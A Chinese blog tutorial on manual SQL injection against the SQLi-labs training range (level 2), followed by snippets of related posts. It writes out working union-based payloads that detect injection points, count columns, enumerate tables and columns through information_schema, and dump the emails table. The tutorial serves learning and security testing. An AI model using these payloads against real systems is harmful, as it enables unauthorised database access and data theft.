渗透测试入门学习——SQL注入基本流程与手动注入技巧SQLi-labs靶场练习

已于 2024-10-30 00:24:38 修改
阅读量1k 收藏 23
点赞数 24
文章标签: mysql 网络安全 SQL注入 SQLi-labs 渗透测试 信息安全 web安全
于 2024-10-30 00:24:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44611153/article/details/143246511
版权

目录

前置知识

SQLi-labs靶场采用的是mysql数据库,再进行SQL注入时需要注意mysql内置的几个存放重要信息的系统库(高版本5.0以上特有):

SQL注入常用的函数:

SQL注入方式

SQL手动注入基本流程

靶场实战

SQL注入基本流程练习(SQLi-labs第二关)

寻找注入点:

判断是数字类型注入还是字符类型注入:

数字类型的查询语句:

字符类型的查询语句(需要区分单引号闭合还是双引号闭合后面不再做补充):

常用的注入数据类型判断是用and关键字进行测试,在?id=1后接and 1=1和and 1=2构造True类型查询和False类型查询进行测试,构造后将会在网站后台执行的的语句大致样子与预测的回显结果将会是:

数字类型:

字符类型(可以在SQLi-labs第一关进行测试):

判断当前表的列数(字段数):

判断是否存在回显点:

信息收集:

构造联合查询查询数据库版本和当前网站所使用的数据库名:

构造联合查询对系统库进行查询,获取当前表名:

获取表名后即可根据表名查询字段名,继续构造联合查询:

根据收集到的表名、字段名进行SQL注入获取字段数据:

前置知识

SQLi-labs靶场采用的是mysql数据库,再进行SQL注入时需要注意mysql内置的几个存放重要信息的系统库(高版本5.0以上特有):

1、information_schema库:存放着MySQL服务器中数据库的信息(SCHEMATA表存放所有库名、TABLES表存放所有表名、COLUMNS表存放所有字段名)

2、performance_schema库:存放着MySQL服务器的性能数据,即执行SQL语句花费了多少时间、内存使用情况等

3、mysql库:存放着数据库用户的基本信息(用户名、密码)、权限信息(对库、表、字段的访问权限信息)

4、sys库:information_schema和performance_schema的结合,储存着那个数据库占用资源最多,那张表的访问量最多等直观的信息。

SQL注入常用的函数:

group_concat:用于将属于一组的相关行的数据项进行合并并以字符串的形式返回,SQL注入时回显点往往只有一个,在对多组数据进行查询可以用此函数将所有结果一次性回显,非常有用

SQL注入方式

1、根据注入方式:手工注入、用脚本自动进行测试并注入

1、根据注入点的数据类型:数字类型注入、字符类型注入

2、根据当前数据库用户权限:高权限注入、低权限注入

3、根据playload不同:联合查询注入、堆叠注入、加解密注入、延时注入、布尔盲注、JSON注入

4、根据数据提交方式不同:GET注入、POST注入、COOKIE注入、XFF注入

SQL手动注入基本流程

1、寻找注入点并判断是否存在SQL注入

2、区分注入点是数字类型注入还是字符类型注入

3、判断是否存在回显点若没有尝试报错注入或盲注

4、判断当前表的列数(字段数)方便后续联进行联合查询

5、信息收集,用联合、报错、盲注等方式获取版本、库名、表名、列名等信息

6、根据收集到的信息够建payload进行SQL注入

靶场实战

SQL注入基本流程练习(SQLi-labs第二关)

寻找注入点:

进入页面后提示我们在URL中传递一个数字类型的ID值,先忽略给出的注入数据类型提示,后续手动测试是否为数字型或字符型

尝试在URL后添加?id=1和?id=3对页面进行测试
​ 

发现页面中出现回显,且两次回显内容不同,判断传入的ID值传入网站后台后被带入到SQL语句中执行了查询操作

判断是数字类型注入还是字符类型注入:

接下来判断此接口是否存在SQL注入,即是否存在注入点,并判断是数字类型注入点还是字符类型注入点,若是字符类型注入点后续进行SQL注入语句构造时需要考虑引号闭合的问题,在网站后台不同数据类型的模板为:

数字类型的查询语句:
select * from <table_name> where id=x
字符类型的查询语句(需要区分单引号闭合还是双引号闭合后面不再做补充):

单引号:

select * from <table_name> where id='x'

双引号:

select * from <table_name> where id="x"
常用的注入数据类型判断是用and关键字进行测试,在?id=1后接and 1=1和and 1=2构造True类型查询和False类型查询进行测试,构造后将会在网站后台执行的的语句大致样子与预测的回显结果将会是:
数字类型:
select * from <table_name> where id=a and 1=1 

回显与?id=1结果相同

select * from <table_name> where id=a and 1=2 

无回显或回显中有结果为空的报错信息 

字符类型(可以在SQLi-labs第一关进行测试):
select * from <table_name> where id = '1 and 1=1'  

回显与?id=1结果相同

select * from <table_name> where id = '1 and 1=2' 

回显与?id=1结果相同

再输入?id=1' and 1=2 --+进行闭合引号进行False类型查询测试:

select * from <table_name> where id = '1'  and 1=2 --+' 

无回显或回显中有结果为空的报错信息

熟悉思路后回到靶场构造True类型查询,用?id=1 and 1=1进行测试:

构造False类型查询,用?id=1 and 1=2进行测试: 

发现和数字类型SQL注的特征一致,确定此处存在SQL注入漏洞,即存在注入点,由于时数字类型注入,在后续进行SQL注入语句构造时就不用考虑引号闭合的问题

判断当前表的列数(字段数):

从第一列开始尝试:?di=1 order by 1;?di=1 order by 2;?di=1 order by 3......

后台执行的SQL语句大概是:

select * from <table_name> where id=a and 1=1 order by 1

尝试到以第四列排序时出现报错:

则可得知此表有3列 (三个字段)

判断是否存在回显点:

构造联合查询判断回显点之前需要先使正常查询查不到内容,无回显的情况下用union构造联合查询来显示特定的测试内容,由于这里使用id进行查询猜测id均为递增的正整数,猜测id值为负数、浮点数的情况下可以达到无回显的效果,字符可能会出现报错

尝试输入:?id=-1

发现无回显,达到了目的,开始构造联合查询:

?id=-1 union select 1,2,3

发现回显点, 联合查询中数字“2”和数字“3”的位置为回显点

信息收集:

构造联合查询查询数据库版本和当前网站所使用的数据库名:
?id=-1 union select 1,version(),database()

发现数据库版本为5.7.26存在系统库,当前数据库名为security

构造联合查询对系统库进行查询,获取当前表名:
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

成功获取当前数据库中有emails、referers、uagents、users表

获取表名后即可根据表名查询字段名,继续构造联合查询:

这里先对emails表进行查询:

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=emails

发现报错,尝试对emails进行十六进制编码再次查询:

留下开头的0x表示十六进制编码即可,其余删掉

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x656d61696c73

成功获取字段名

根据收集到的表名、字段名进行SQL注入获取字段数据:

这里0x3a是字符":"的十六进制编码,用做分隔符

?id=-1 union select 1,2,(select group_concat(id,0x3a,email_id)from emails)

成功获取到emails表中的所有数据数,想要获取其他数据库中的信息也是同理

Dovir多多
关注
SQL注入--靶场练习
wmr123456001的博客
02-11 2267
SQL注入靶场练习
sql注入靶场练习
akxnxbshai的博客
04-01 681
远古素材,图床炸了一次后就没交,今天没事就改一下。
Pikachu靶场-SQL注入
最新发布
sucker的博客
04-21 1361
搜索型SQL注入发生在网站的搜索功能模块中,由于开发者未对用户输入进行有效过滤,导致攻击者可通过构造恶意输入篡改SQL查询逻辑。UPDATE注入发生在应用程序将用户输入直接拼接到UPDATE语句中,允许攻击者修改数据库中的现有数据,可能导致数据篡改、权限提升或信息泄露。SQL注入中的INSERT注入发生在应用程序将用户输入不安全地拼接到INSERT语句中时,允许攻击者操纵数据库操作。是一种需要特定闭合符号的SQL注入类型,其核心在于识别并绕过SQL语句中的闭合符号(如单引号或括号),从而构造恶意查询。
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4431
一次简单的SQL注入靶场练习
SQL注入-靶场案例练习
m0_73902453的博客
07-30 793
接下来知道了语句闭合的方法,就尝试直接利用盲注来查找字段数,直接用联合查询,select 1,select 1,2.....一个个进行尝试,发现在输入select 1,2的时候页面显示了1和2,再输入1,2,3的时候页面就报错了,此刻我们就知道了该页面的字段数为2。我们传参行改为下列语句,在用户名里一般是不会有-号开头的,一般是字符串,所以在admin前的-就是让uname是找不到这个参数的,以便于不会覆盖掉后面联合查询的1和2,而最后的--+属于注释符,将后面的语句闭合掉。',",)也有可能是;
SQL注入练习 --- Sqli-labs靶场
Zhuoqian_1的博客
03-11 372
这几天学习了一些基础的SQL注入,刷一刷Sqli-labs靶场练习一下。 现在做了:0道 已完成: SQLi-LABS Page-1(Basic Challenges) Page-2 (Advanced Injections) Page-3 (Stacked Injections) Page-4 (Challenges)
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs 靶场源码
01-06
通过在sqli-labs靶场中进行测试,安全研究人员和开发者可以对应用程序的SQL注入防护能力进行评估。此外,它也是一个优秀的学习工具,可以帮助初学者快速上手并深入理解SQL注入的攻击手段和防御策略。同时,这个靶场...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 此同时,"phpStudy"是一个流行...
sqli-labs-master靶场
09-21
sqli-labs-master靶场是一个针对安全研究人员、开发者和网络安全爱好者的实践平台,特别设计用于学习和测试SQL注入攻击技术。SQL注入是一种常见的网络攻击手段,攻击者通过在应用程序的输入字段中注入恶意的SQL代码...
sql 注入之 piakchu 靶场练习
Goodric的博客
02-14 470
sql注入 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 上篇博客对sql注入的一些知识进行了学习SQL注入学习 下面通过 pikachu 靶场sql 注入的几种方式进行测试 数字型注入 打开页面,可以看到对输入的内容进行了限制。 尝试随便选择一个数字进行查询,由于是 post 请求,url 没有发生变化。 用 burp 抓包,可以看到请求的数据。 发到 Repeater 模块进行测试,可以在 Params 处修改参数 id
SQL注入(一)—— sql手动注入实操
热门推荐
Genevieve_xiao的博客
08-07 7万+
SQLSQL注入sql 注入的核心SQL 手注的一般流程判断注入点 —— 第一步判断字段数 —— 第二步判断回显点 —— 第三步查询相关内容 —— 第四步判断库名判断表名判断列名查询具体信息总结 SQL注入 SQL注入攻击是目前web应用网络攻击中最常见的手段之一,曾被冠以 “漏洞之王” 的称号,其安全风险高于缓冲区溢出漏洞等所有其他漏洞,而市场上的防火墙又不能对SQL注入漏洞进行有效的检测和防范。 SQL注入攻击普遍存在范围广、实现容易、破坏性大等特点。 先来走一遍国际惯例——定义入手:什么是SQ
sql注入sqli-labs靶场
qq_61019688的博客
04-25 246
id=1'and 1=1--+和?id=1'and 1=2--+,页面有明显变化,1=1为真,正常返回,1=2为假,页面报错,由此可以判断是字符型注入;id=-1' union select 1,database(),version()--+,获取数据库名和版本信息(注意此处id必须设为-1,即一个不存在的id,才能正常回显数据)id=1' order by 3--+正常回显,可知表的列数为3;id=1 and 1=2,页面无变化,说明and 1=1和and 1=2语句未被执行,由此判断不是数字型注入
手动Sql注入
cai_jshsghjs的博客
03-08 2434
id=-1’ union select 1,2,database() --+)​ concat_ws(1,2,3):将参数2和参数3 使用参数1连接起来 参数1:‘-’ 参数2:执行查询语句 参数3:floor(rand(0)*2)闭合单引号, 使用‘ 号时,发现报错,当使用id=1’ or '时正确, id=1’ and (select database()=‘users’) or。使用括号绕过空格,select(user())from dual where(1=1)and(2=2)
SQL手动注入
weixin_43056654的博客
02-25 291
SQL注入定义 -web应用程序对用户输入的数据的合法性没有做判断,前端输入后端的参数 是 攻击者可控制的,并且参数代入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作 SQL注入条件 - 参数用户可控 - 参数带入数据库查询,传入的参数拼接到SQL语句,并且带入数据库查询 注入分类 - 注入位置数据类型不同 - 1、字符串注入 -...
sql手动注入
haodawei123的博客
01-16 874
第一步:判断环境,寻找注入点 确定注入点:用’报错就有注入的希望 and 1=1 正常 and 1=2 报错就基本注入 第二步:猜解表名 检测是否存在admin表,正确存在,返回错误则不存在 And exists (select * from admin) 第三步:猜解字段 Order by字段长度 猜解数据库存在多少数据表 如45正确,46错误,则有45个表 And 1=2 union s...
pikachu靶场SQL注入
2201_75766364的博客
03-28 1341
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库将sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
sqli-labs靶场:掌握SQL注入渗透测试技巧
sqli-labs是一个面向初学者和中级渗透测试人员的SQL注入练习平台,它提供了不同难度级别的练习场景,用户可以在这些场景中尝试使用各种SQL注入技巧。在开始使用sqli-labs之前,用户需要具备一定的Web应用结构知识、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值